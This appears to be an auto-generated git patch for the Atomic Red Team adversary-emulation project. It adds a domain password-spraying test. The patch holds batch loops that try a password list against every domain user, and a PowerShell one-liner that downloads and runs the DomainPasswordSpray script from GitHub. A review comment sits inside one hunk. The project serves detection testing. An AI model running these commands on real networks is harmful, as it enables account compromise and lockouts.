From 5f4b9dba55c2cc7a7db8f0a575603823c7ab2048 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Wed, 1 Jul 2020 18:49:48 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master

---
 atomics/Indexes/Indexes-CSV/index.csv | 1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv | 1 +
 atomics/Indexes/Indexes-Markdown/index.md | 1 +
 .../Indexes/Indexes-Markdown/windows-index.md | 1 +
 atomics/Indexes/index.yaml | 29 ++++++++++++++--
 atomics/T1110.003/T1110.003.md | 33 +++++++++++++++++++
 atomics/T1110.003/T1110.003.yaml | 1 +
 atomics/used_guids.txt | 1 +
 8 files changed, 65 insertions(+), 3 deletions(-)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index e4f467af..a5209f37 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -188,6 +188,7 @@ credential-access,T1003,OS Credential Dumping,2,Gsecdump,96345bfc-8ae7-4b6a-80b7
 credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
 credential-access,T1110.001,Password Guessing,1,Brute Force Credentials,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
 credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
+credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
 credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
 credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 5d64bb8f..ddd04a85 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -418,6 +418,7 @@ credential-access,T1003,OS Credential Dumping,2,Gsecdump,96345bfc-8ae7-4b6a-80b7
 credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
 credential-access,T1110.001,Password Guessing,1,Brute Force Credentials,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
 credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
+credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
 credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 7a372883..45438c98 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -408,6 +408,7 @@
 - Atomic Test #1: Brute Force Credentials [windows]
 - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
 - Atomic Test #1: Password Spray all Domain Users [windows]
+ - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
 - [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
 - Atomic Test #1: Private Keys [windows]
 - Atomic Test #2: Discover Private SSH Keys [macos, linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 233977fd..a79c0166 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -861,6 +861,7 @@
 - Atomic Test #1: Brute Force Credentials [windows]
 - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
 - Atomic Test #1: Password Spray all Domain Users [windows]
+ - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
 - [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
 - Atomic Test #1: Private Keys [windows]
 - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 3e0b7db6..b5837c12 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -18880,13 +18880,13 @@ credential-access:
 type: String
 default: YOUR_COMPANY
 executor:
+ name: command_prompt
 command: |
 net user /domain > #{input_file_users}
 echo "Password1" >> #{input_file_passwords}
 echo "1q2w3e4r" >> #{input_file_passwords}
 echo "Password!" >> #{input_file_passwords}
 @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
- name: command_prompt
 T1110.003:
 technique:
 external_references:
@@ -18986,10 +18986,33 @@ credential-access:
 prereq_command: if not exist %temp%\users.txt (exit /b 1)
 get_prereq_command: PathToAtomicsFolder\T1110.003\src\parse_net_users.bat
 executor:
+ name: command_prompt
+ elevation_required: false
 command: '@FOR /F %n in (%temp%\users.txt) do @echo | set/p=. & @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password}
- && @net use /delete %logonserver%\IPC$ > NUL'
- name: command_prompt
+ && @net use /delete %logonserver%\IPC$ > NUL
+
+'
+ - name: Password Spray (DomainPasswordSpray)
+ auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b
+ description: |
+ Perform a domain password spray using the DomainPasswordSpray tool. It will try a single password against all users in the domain
+
+ https://github.com/dafthack/DomainPasswordSpray
+ supported_platforms:
+ - windows
+ input_arguments:
+ domain:
+ description: Domain to brute force against
+ type: String
+ default: "(Get-ADDomain | Select-Object -ExpandProperty Name)"
+ executor:
+ name: powershell
+ elevation_required: false
+ command: 'IEX (IWR ''https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1'');
+ Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force
+
+'
 T1552.004:
 technique:
 id: attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf
diff --git a/atomics/T1110.003/T1110.003.md b/atomics/T1110.003/T1110.003.md
index f88a3295..d09895f7 100644
--- a/atomics/T1110.003/T1110.003.md
+++ b/atomics/T1110.003/T1110.003.md
@@ -25,6 +25,8 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
 - [Atomic Test #1 - Password Spray all Domain Users](#atomic-test-1---password-spray-all-domain-users)
+- [Atomic Test #2 - Password Spray (DomainPasswordSpray)](#atomic-test-2---password-spray-domainpasswordspray)
+
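Review bot: The new `Password Spray (DomainPasswordSpray)` entry in this hunk declares no `dependencies:` block, although its `domain` default `(Get-ADDomain | Select-Object -ExpandProperty Name)` only resolves when the ActiveDirectory PowerShell module is installed and the `IEX (IWR ...)` executor needs outbound HTTPS to raw.githubusercontent.com; the preceding test in the same hunk does declare `prereq_command`/`get_prereq_command` for what it needs. Since index.yaml is generated, the change belongs in atomics/T1110.003/T1110.003.yaml: add `dependency_executor_name: powershell` and a `dependencies` entry with `description: ActiveDirectory PowerShell module must be available` and `prereq_command: if (Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}`, plus a `get_prereq_command` that installs the RSAT Active Directory tools, so a missing module fails the prerequisite check rather than the spray itself. The remote script is pinned to commit 94cb72506b9e2768196c8b6a4b7af63cebc47d88, which keeps the executed content fixed and reviewable; that pin should be preserved in any later edit of the source yaml.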
@@ -68,4 +70,35 @@ PathToAtomicsFolder\T1110.003\src\parse_net_users.bat
+
+
+
+## Atomic Test #2 - Password Spray (DomainPasswordSpray)
+Perform a domain password spray using the DomainPasswordSpray tool. It will try a single password against all users in the domain
+
+https://github.com/dafthack/DomainPasswordSpray
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| domain | Domain to brute force against | String | (Get-ADDomain | Select-Object -ExpandProperty Name)|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1'); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force
+```
+
+
+
+
+
diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml
index ed49bcc4..5a97f94c 100644
--- a/atomics/T1110.003/T1110.003.yaml
+++ b/atomics/T1110.003/T1110.003.yaml
@@ -34,6 +34,7 @@ atomic_tests:
 @FOR /F %n in (%temp%\users.txt) do @echo | set/p=. & @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL
 - name: Password Spray (DomainPasswordSpray)
+ auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b
 description: |
 Perform a domain password spray using the DomainPasswordSpray tool. It will try a single password against all users in the domain
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 748b6f12..f399d74d 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -539,3 +539,4 @@ d9841bf8-f161-4c73-81e9-fd773a5ff8c1
 224f7de0-8f0a-4a94-b5d8-989b036c86da
 542bb97e-da53-436b-8e43-e0a7d31a6c24
 21748c28-2793-4284-9e07-d6d028b66702
+263ae743-515f-4786-ac7d-41ef3a0d4b2b